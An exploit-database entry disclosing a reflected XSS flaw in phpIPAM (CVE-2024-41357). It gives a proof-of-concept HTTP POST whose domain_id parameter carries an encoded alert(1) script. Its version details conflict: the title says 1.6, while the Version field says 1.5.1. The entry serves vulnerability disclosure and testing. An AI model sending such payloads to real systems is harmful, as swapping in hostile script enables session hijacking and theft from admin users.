phpIPAM 1.6 - Reflected-Cross-Site Scripting (XSS)
Author: CodeSecLab
type: webapps
platform: php
port:
date_added: 2025-12-02
date_updated: 2025-12-02
verified: 0
codes: CVE-2024-41357
tags:
aliases:
screenshot_url:
application_url:
# Exploit Title: phpIPAM 1.6 - Reflected Cross-Site Scripting (XSS)
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/phpipam/phpipam/
# Software Link: https://github.com/phpipam/phpipam/
# Version: 1.5.1
# Tested on: Windows
# CVE : CVE-2024-41357
Proof Of Concept
# PoC to trigger XSS vulnerability in phpipam 1.6
# Ensure you are logged in as an admin user to satisfy the admin check condition.
# Send the following POST request to trigger the XSS vulnerability:
POST /app/admin/powerDNS/record-edit.php HTTP/1.1
Host: phpipam
Content-Type: application/x-www-form-urlencoded
Content-Length: <calculated_length>
action=add&domain_id=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
# This will execute the alert(1) script when the response is rendered in the browser.